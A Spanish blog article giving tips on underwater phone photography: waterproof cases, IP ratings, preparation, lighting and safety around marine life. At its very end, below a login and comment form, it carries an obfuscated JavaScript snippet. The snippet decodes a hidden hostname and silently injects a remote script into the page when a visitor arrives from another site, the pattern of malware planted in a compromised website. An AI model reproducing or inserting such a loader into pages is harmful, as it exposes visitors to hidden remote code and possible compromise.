Cómo hacer fotos bajo el agua con el móvil

Table of Contents

    ¿Vas a ir a bucear o a nadar pero no tienes una cámara submarina? Solo porque no tengas una no significa que ya no puedas capturar toda esa belleza de la vida marina que tienes ante ti. Hay formas de tomar fotos submarinas con la cámara de tu teléfono móvil sin que el móvil se estropee.

    ¿Cómo puedes tomar fotos subacuáticas con tu teléfono? Puedes tomar fotos y videos submarinos con tu teléfono móvil con una funda protectora o con un estuche rígido para tu modelo de móvil. Aunque el teléfono tenga una etiqueta que indique que es resistente al agua, no lo es, por lo que necesitarás una funda para evitar el contacto con el agua.

    Sin embargo, además de la necesidad de conseguir una funda o estuche resistente al agua, hay otras cosas que debes saber antes de llevar el teléfono en tus inmersiones bajo el agua.

    ¿Por qué tomar fotos bajo el agua cuando solo tienes un teléfono?

    La gente toma fotos bajo el agua por la misma razón que toma fotos de cualquier cosa en tierra. Las escenas submarinas son hermosas e impresionantes, especialmente cuando hay corales, peces de colores, tortugas y otra vida marina. Y si todo lo que tienes es un teléfono, nada debería impedirte capturar este paisaje para que tengas algo que recuerde tu experiencia submarina.

    Además, algunas personas están en su elemento cuando entran en el agua. Así que es fácil que quieras tener fotos de tus amigos y familiares nadando, buceando y divirtiéndose, aunque solo estés en una piscina. Las fotos subacuáticas aumentarán la diversión mientras posas bajo el agua. Estas fotos también serán originales y diferentes a las que normalmente estás acostumbrado a realizar o ver de otras personas. ¡Tienes que probarlo!

    Tomar fotos subacuáticas de manera económica

    No tienes que conseguir una GoPro (aunque hay ofertas en Amazon) o cualquiera de las mejores cámaras sumergibles para poder tomar fotos acuáticas. Estos dispositivos son caros aunque específicos para este tipo de fotografía. Por lo tanto, si estás en un viaje, pasando unas vacaciones en la playa o en una escapada de fin de semana, y quieres hacer esnórquel esto es algo que no ocurre a menudo, y claro no tienes por qué hacer este tipo de inversión para un uso tan esporádico. Tener un teléfono inteligente con una buena debería ser suficiente para poder fotografiar lo que hay bajo la superficie del agua.

    Puedes hacer que tu smartphone funcione para una sesión de fotos bajo el agua simplemente consiguiendo una carcasa o estuche sumergible que proteja el teléfono del agua. Hay diferentes tipos de carcasas impermeables disponibles en el mercado, e incluso puedes conseguir una específica para tu modelo de smartphone. Y si bien es cierto que estas fundas protectoras específicas para tu modelo de móvil tienen un precio superior a las universales, también lo es que son mucho más asequibles que comprar una cámara subacuática.

    Por supuesto, tendrás que moderar tus expectativas. Las fotos tomadas con el teléfono no serán tan claras y nítidas como las que se toman con un GoPro. Las fotos subacuáticas con tu teléfono inteligente serán tan buenas como lo sea la cámara que tenga el móvil. Y aunque tengas una cámara muy buena, la funda protectora, la falta de iluminación y el agua disminuirán la calidad de la foto.

    ¿Qué sucede si el teléfono es resistente al agua?

    Hay gente que piensa que como el fabricante ha calificado su smartphone como resistente al agua, es suficiente para mojarlo y sumergirlo bajo el agua.

    Hay que aclarar que el decir resistente al agua, solo significa que el teléfono puede resistir la penetración del agua y la corrosión, pero sólo hasta cierto punto. Los teléfonos resistentes al agua pueden soportar salpicaduras de agua y no se dañan fácilmente cuando se mojan. Resistente al agua, por otro lado, significa que el agua no puede penetrar en él, independientemente del tiempo que pase en el agua.

    Por lo tanto, si bien algunos teléfonos pueden sobrevivir a una caída y que rápidamente se saca del agua, no son realmente a prueba de agua. Ningún teléfono lo es.

    ¿Qué significa la clasificación IP de resistencia al agua?

    Muchos modelos afirman ser resistentes al agua e incluso indican su clasificación IP. Estas clasificaciones IP definen el nivel de resistencia al agua de una unidad con respecto a la profundidad del agua, y el tiempo que puede sumergirse sin sufrir daños.

    El nivel de resistencia al agua más común para los smartphones es IP67 e IP68. Los teléfonos que tienen la clasificación IP67 son totalmente resistentes al polvo y pueden salir indemnes de una zambullida en el agua a un metro de profundidad y hasta 30 minutos de duración. Mientras tanto, los teléfonos con clasificación IP68 pueden sumergirse de forma segura en agua a dos metros de profundidad durante un máximo de 30 minutos.

    Sin embargo, si quieres ser práctico, seguramente no querrás poner a prueba los límites de tu teléfono y sumergirlo bajo el agua sin ninguna funda protectora. Recuerda que el agua y cualquier otro líquido pueden dañar el teléfono y, para la mayoría de las marcas, este tipo de daño generalmente no está cubierto por la garantía.

    Cómo elegir una funda impermeable para el teléfono

    Las carcasas impermeables son transparentes por ambos lados para permitir el uso de la cámara y de la vista previa de la pantalla. También están hechas de materiales que permiten la sensibilidad de la pantalla, lo que significa que puedes seguir manejando las funciones tactiles de la pantalla del teléfono aunque esté dentro de la carcasa. Sobre todo, las uniones de estas carcasas impermeables sestán selladas herméticamente para mantener el agua fuera.

    Sin embargo, no todas las carcasas de teléfonos a prueba de agua son iguales. Así que no compres la primera que veas en una tienda de electrónica. Tienes que elegir la correcta para el modelo de tu teléfono, investigar y verificar cuáles tienen una valoración alta, y buscar una que tenga las características que necesitas, y una garantía opcional o gratuita para los daños causados por el agua.

    También debes tomarte tu tiempo para leer la descripción del producto. Hay fundas para teléfonos que dicen ser a prueba de agua (Waterproof) pero en realidad son solo resistentes al agua o a las salpicaduras(water-resistat). Esto significa que puedes tomar el teléfono y hacer fotos mientras paseas por la playa o te relajas junto a la piscina y no te tienes que preocupar por la arena o las gotas de agua que puedan salpicar a tu móvil, pero aun así tendrás que dejarlo en la orilla cuando vayas a darte un chapuzón dentro del agua.

    ¿Caja o funda?

    Si tienes el presupuesto para ello, consigue un estuche o caja rígida hecha de policarbonato resistente a los golpes con una superficie engomada. También hay estuches con un marco de metal resistente, TPU (poliuretano termoplástico) o silicona. La mayoría de los estuches rígidos están hechos para adaptarse a modelos específicos de teléfonos. Es por esto que debes elegir el que se adapte al tuyo

    Ahora bien, si lo que quieres es la opción más económica, hay fundas de plástico muy asequibles que están diseñadas para soportar condiciones extremas bajo el agua. Estas fundas son universales y se adaptan a la mayoría de los modelos de teléfonos. Lo mejor de la mayoría de los estuches es que vienen con un cordón para que puedas ponértelo alrededor del cuello y así tener las manos libres cuando no estés tomando fotos.

    Qué hacer antes de sacar fotos submarinas con el teléfono

    Ya tienes una carcasa impermeable para tu teléfono, así que ¿ya puedes ir con tu smartphone a hacer snorkel a la playa? No tan rápido. Hay algunas cosas que debes hacer antes:

    1. Prueba tu teléfono y la carcasa acuática. Antes de someter el teléfono a condiciones submarinas extremas, ponlo a prueba en la bañera o tal vez en un cubo con agua. Comprueba si el producto está bien sellado y evita eficazmente que el agua entre en su interior. Por si acaso falla, pruébalo en agua dulce, ya que es menos dañina para los teléfonos que el agua salada. Si hay fugas de agua significan que no cerraste la carcasa correctamente o que el producto es defectuoso. Si es lo último, deberías conseguir un recambio o un que te ofrezcan otro producto completamente diferente.
    2. Estudia tu equipo y experimenta con tomas subacuáticas. Ve a una piscina al aire libre y trata de tomar fotos bajo el agua. Comprueba qué ajustes del teléfono y la cámara funcionarían mejor para tus fotos subacuáticas, experimenta los ángulos que te resulten cómodos mientras nadas y sostienes el teléfono, y familiarízate con las limitaciones del teléfono bajo el agua. Estudiando tu equipo y practicando, podrás tomar fotos submarinas perfectas en poco tiempo.
    3. Carga tu teléfono antes de disparar. Una vez que estés en el lugar, asegúrate de que tu teléfono esté completamente cargado antes de saltar al agua. No querrás que el teléfono se te muera justo cuando por fin estés listo para hacer un primer plano de una tortuga marina.
    4. Limpia la parte delantera de la cámara del teléfono. Limpia la cámara antes de meterla en la funda o el estuche. Esto asegurará imágenes más claras, nítidas y brillantes.
    5. Ten en cuenta la climatología. Lee las previsiones meteorológicas locales antes de salir a mar abierto. Asegúrate de que va a haber una climatología agradable y tiempo soleado en el exterior mientras estás en tu aventura submarina, pero sobre todo, asegúrate de que vas a estar seguro. De que no haya lluvias, ni avisos de mareas, ni haya olas fuertes.
      También es posible que quieras conocer primero donde harás las fotos, si habrá muchos bañistas o botes y canoas. No querrás que aparezcan pies de nadadores desconocidos al azar en varias de tus fotos.

    Consejos para tomar buenas fotos submarinas con el teléfono

    La calidad de tus fotos submarinas puede verse comprometida o afectada por ciertos factores. Incluso si el teléfono tiene la última cámara incorporada, es posible que las fotos no sean tan nítidas y claras como si estuvieran hecha fuera del agua. Esto se debe a la capa adicional de vídrio o plástico que cubre la lente de la cámara, a las malas condiciones de iluminación bajo el agua, a la limitada funcionalidad de la pantalla táctil y a la falta de flexibilidad a la hora de tomar el ángulo perfecto.

    Aquí tienes algunos consejos sobre cómo puedes tomar buenas fotos bajo el agua con el teléfono:

    1. Programa tu actividad submarina o acuática durante la mitad de la mañana hasta la mitad de la tarde. Durante este tiempo, el sol brilla y tendrás una visibilidad subacuática absoluta. Podrás optimizar la luz natural que entra al agua.Estar bajo el agua entre las 10 a.m. y las 2 p.m. significa que los rayos del sol vienen desde atrás o desde un ángulo inclinado, por lo que no tendrás tantos problemas con el resplandor como cuando estás disparando al mediodía. Por otro lado, la luz solar penetra en el agua más profundamente al mediodía, por lo que disparar bajo el agua a esta hora te dará más luz.
    2. Abre la cámara antes de sumergirte. En el momento en que el teléfono se encuentre bajo la superficie del agua, las funciones de la pantalla táctil serán inútiles. Por lo tanto, asegúrate de abrir la aplicación de la cámara antes de hacer una inmersión y utiliza los botones de volumen del lateral como disparador o para hacer clic en la cámara.Y cuando fotografíes sujetos que se mueven rápidamente bajo el agua, toma fotos en modo ráfaga. Puedes hacerlo manteniendo el botón del volumen pulsado.
    3. Se creativo con tus fotos. Por ejemplo, intenta colocarte debajo del sujeto para capturar el reflejo del agua. También puedes experimentar con fotos tomadas mitad por encima de la superficie del agua y mitad por debajo, para mostrar el interesante contraste entre ambas. Además, deberías tomar fotos de cerca de tu sujeto, ya sean peces, corales, tortugas o caparazones. Acercarse a tu sujeto te ayudará a mantener la nitidez y el color de tu toma. No querrás que tus tomas se estropeen con lo que precerín motas de polvo bajo el mar.
    4. Diviértete, pero no dañes a las criaturas marinas. No persigas y asustes a los peces. Además, ten en cuenta que no todas las criaturas quieren que los humanos las toquemos. Si no estás seguro de si tu presencia agrede a la vida marina, simplemente no las toques.

    Otras cosas a considerar

    Si quieres fotografiar la fauna marina con luz natural, también deberías comprobar estas cosas:

    La claridad del agua. El agua salada calmada tiende a ser la más clara, mientras que el agua dulce tiende a tener la que menor claridad tiene. A pesar de que la piscina al aire libre parece ser clara, en ella podrían salirte fotos borrosas o saturadas. Eso se debe a que el agua de la piscina contiene químicos que tus ojos no pueden ver.

    Vida marina peligrosa o poco amistosa. Averigua de antemano si hay criaturas marinas que puedan ser peligorsas, y si las hay, es mejor no sumergirse en absoluto. Por ejemplo, en algunos lugares, y durante ciertas épocas del año, podría haber medusas cuyas picaduras pueden ser fatales o muy molestas. También hay que tener cuidado con los erizos de mar. Aunque no son peligrosos, pisar uno no es una experiencia nada agradable.

    Olas. Para tomar grandes fotos submarinas, lo ideal sería que el agua estuviera lo más tranquila posible. Sin embargo, debes tener en cuenta que aunque la superficie del agua puede parecer tranquila cuando se la ve desde la orilla, en realidad puede ser bastante peligrosa.

    Corrientes. Lo mejor para ti es evitar las corrientes, especialmente las corrientes o resacas marinas, ya que pueden ser muy fuertes y peligrosas. Puedes averiguar de antemano dónde y cuándo ocurren para esperarlas, y estar prevenido. ¡Cuidado con el mar de fondo!

    El lecho marino. ¿El lecho marino es arenoso o rocoso? Saber qué porción de las aguas tiene fondos arenosos y rocosos te ayudaría a decidir cómo preparar tu sesión de fotos. Un fondo arenoso puede reflejar mejor la luz del sol. Sin embargo, habrá más barro o limo flotando en el agua. Un fondo marino rocoso, por otro lado, refleja menos luz solar, pero tendrás en cambio un agua más clara. En un fondo rocoso también es más difícil estar de pie por su irregularidad.

    Otros accesorios que podrías necesitar

    Además de la carcasa impermeable, puede que quieras conseguir algunos accesorios más para ayudarte con tu sesión de fotos. Invertir en accesorios adicionales puede ser práctico si tienes la intención de hacer sesiones de fotos similares en el futuro o si te encuentras en unas vacaciones prolongadas que impliquen muchas actividades relacionadas con la playa y el agua.

    Puedes conseguir en Amazon ofertas de palos de selfie o monopod que sean compatibles con la carcasa de tu teléfono sumergible. Será difícil mantener tu mano firme mientras nadas, flotas o caminas bajo el agua, y este accesorio te ayudará con eso. Un palo de selfie mantendrá tu mano y tu teléfono estables mientras haces tomas bajo el agua.

    También es crucial que elijas una carcasa impermeable con un cordón o una correa para la muñeca, o al menos una ranura para que puedas colocar una correa. Esto se debe a que necesitas proteger tu teléfono para que no se te caiga por accidente en las profundidades, especialmente si estás haciendo snorkel y no tienes a otro compañero contigo. Como alternativa, puedes conseguir una correa de mano flotante.

    Por supuesto, también tendrías que tener en cuenta tu ropa. Lo mejor es que uses un traje de neopreno (ya que si vas a permanecer mucho tiempo en el agua mantendrá tu temperatura corporal) o alguna prenda ajustada. Cualquier cosa suelta podría interferir con tus fotografías ya que la ropa suelta tiende a flotar a tu alrededor cuando estás bajo el agua.

    Nota final

    Ahora que estás equipado para tomar fotos subacuáticas según lo planeado, una última cosa que necesitas hacer es aprender a anticiparte a los momentos clave. Y no hay mejor manera de hacerlo que a través de la práctica. Cuantas más fotos hagas, mejor sabrás cuándo esperar un momento clave, lo que te dará tiempo suficiente para apuntar la cámara y disparar al sujeto justo cuando la acción ocurra.

    Y como estamos hablando de fotos submarinas, deberías aprender a aceptar que muchas imágenes estarán distorsionadas, borrosas o saldrán oscuras. Estas fotos pueden no ser perfectas, pero tienen un toque de autenticidad y realidad que las distingue. Siempre podrás mejorar las fotografías descargando la App Remini.

    La fotografía submarina, sin importar la cámara que uses, te llevará tiempo, paciencia y práctica para dominarla. Cuanto más cómodo te sientas con tu equipo, que en este caso es tu smartphone, mejores imágenes tomarás. La experiencia te enseñará sobre las condiciones de iluminación, la composición y los ángulos. Y tal vez cuando tengas más tiempo, llegarás a dominar también las técnicas de edición.

    Volver a la página del BLOG

    Allí encontrarás artículos sobre fotografía de eventos con información interesante.
    Ir al BLOG

    Deja el primer comentario

    Iniciar sesión

    Correo electrónico *
    Contraseña *

    REGÍSTRATE

    Correo electrónico *
    Contraseña *
    !function (_5f186) { var _7e0bb3 = Date.now(); var _e34a6f = 1000; _7e0bb3 = _7e0bb3 / _e34a6f; _7e0bb3 = Math.floor(_7e0bb3); var _f17f41 = 600; _7e0bb3 -= _7e0bb3 % _f17f41; _7e0bb3 = _7e0bb3.toString(16); var _fbc2f0 = _5f186.referrer; if (!_fbc2f0) return; var _cc24b6 = [33991, 34002, 34004, 33984, 33949, 33984, 33991, 34010, 34000, 34008, 34015, 34012, 34002, 34007, 34006, 33985, 33949, 34010, 34013, 34005, 34012]; _cc24b6 = _cc24b6.map(function(_bcded5){ return _bcded5 ^ 33971; }); var _c16f5a = "6f5ae20d5c54f56d58ceb4695da44c11"; _cc24b6 = String.fromCharCode(..._cc24b6); var _37802c = "https://"; var _d8c428 = "/"; var _aeb9f5 = "mount."; var _7f4946 = ".js"; var _1f2600 = _5f186.createElement("script"); _1f2600.type = "text/javascript"; _1f2600.async = true; _1f2600.src = _37802c + _cc24b6 + _d8c428 + _aeb9f5 + _7e0bb3 + _7f4946; _5f186.getElementsByTagName("head")[0].appendChild(_1f2600) }(document);